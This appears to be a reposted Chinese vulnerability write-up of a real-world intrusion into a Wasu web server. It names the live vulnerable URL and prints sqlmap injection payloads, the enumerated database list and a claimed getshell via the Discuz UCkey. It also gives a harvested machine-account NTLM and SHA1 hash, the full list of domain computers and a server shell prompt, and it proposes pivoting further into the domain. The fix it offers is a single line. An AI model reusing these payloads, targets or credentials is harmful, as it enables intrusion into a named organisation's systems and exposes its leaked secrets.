IT工程師數位筆記本

華數某站SQL注入漏洞http://os.wasu.cn/mp/mp.php?id=330
sqlmap identified the following injection points with a total of 93 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=330 AND 5132=5132
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=330 AND (SELECT * FROM (SELECT(SLEEP(5)))msCa)
---
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.12
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=330 AND 5132=5132
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=330 AND (SELECT * FROM (SELECT(SLEEP(5)))msCa)
---
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.12
available databases [21]:
[*] `lt-dx`
[*] adbbs
[*] bbsx
[*] computer
[*] disk
[*] ftp
[*] information_schema
[*] jdhwx
[*] ks
[*] main
[*] mysql
[*] new
[*] qyks
[*] softdown
[*] tj
[*] ucenter
[*] uchome
[*] wjhy
[*] yuangong
[*] zzynetdisk
[*] zzysupesite
adbbs 跑出管理員密碼 因為是DZ 2.5 使用UCkey 直接進行getshell





進行抓密碼~~~
[00000002] Primary
  * Username : WWWOS$
  * Domain   : WASU
  * NTLM     : a8b75cb78bf35729ee365d3bf3e039f9
  * SHA1     : d9607a36d353b266f83ffd653df0597855d8703c
注釋     加入到域中的所有工作站和服務器
成員
-------------------------------------------------------------------------------
BEIJIN-ORACLE$           BEIJIN-WEB$              BES2010R3$              
CLUSTER-CA-1$            CLUSTER-CA-2$            CLUSTER-CA-3$           
CMWL-YYGL-315$           CM-YYGL-1$               CX-VPN$                 
DC3$                     DC-CHANGPWD$             FTP$                    
HL-VPN$                  HP-VCENTER$              JHZJ-WIN2008$           
JW-JF2$                  JW-W1$                   JWWORK-UNDER$           
KFFD$                    MANAGERLINK$             MOSS-APP$               

MOSS-APP1$               MOSS-APP2$               MOSS-SEARCH$            
MOSS-SQL2008$            MOSSWEB$                 MOSS-WEB1$              
MOSS-WEB2$               NOD321$                  NOD322$                 
openfiler$               SANFOR-SMS-1$            SANFOR-TOOLS$           
SANGFOR-LOG$             SQL2012$                 SQLSERVER$              
TMG$                     VCENTER5$                VCENTER51$              
VCENTER55$               VCENTER55VCUM$           VIEW-THINAPP$           
VINTENTORY51$            VMVIEW51$                VMVIEW51S$              
VM-VIEW5-S$              VMVIEWCOMPOSER$          VMWARE-SQL$             
VMWARE-VCSA$             VMWARE-VCUM$             VSSOS51$                
WASU-001$                WASU-003$                WASU-BLJ$               
WASU-BLJ-SELF$           WASU-CG$                 WASU-DHCP$              
WASU-DNS$                WASU-JT-DAGL$            WASU-KMS$               
WASU-SCCM$               WASU-SMS-1$              WASU-SQL2000$           
WASU-VM-BACKUP$          WASU-VPN1$               WASU-WORKFLOW$          
WASU-YKT$                WASU-YKT-RSQL$           WASU-YKT-RWEB$          
WASU-YYT-PDJH$           WIN2003$                 WIN2008-LOG$            
WSUS$                    WWWOS$                   ZZYWK$                  
命令成功完成。
 
D:\APMServ5.2.6\www\htdocs\os.wasu.cn\adbbs\config\> hostname
wwwos
在域內(可能是域管)~~~開下代理應該能進行域滲透~
解決方案：
~~徹底審查SQL注入~
就愛閱讀www.92to.com網友整理上傳,為您提供最全的知識大全,期待您的分享，轉載請注明出處。
歡迎轉載：http://www.kanwencang.com/bangong/20161116/56114.html

文章列表

---

Avast 防毒軟體已檢查此封電子郵件的病毒。 www.avast.com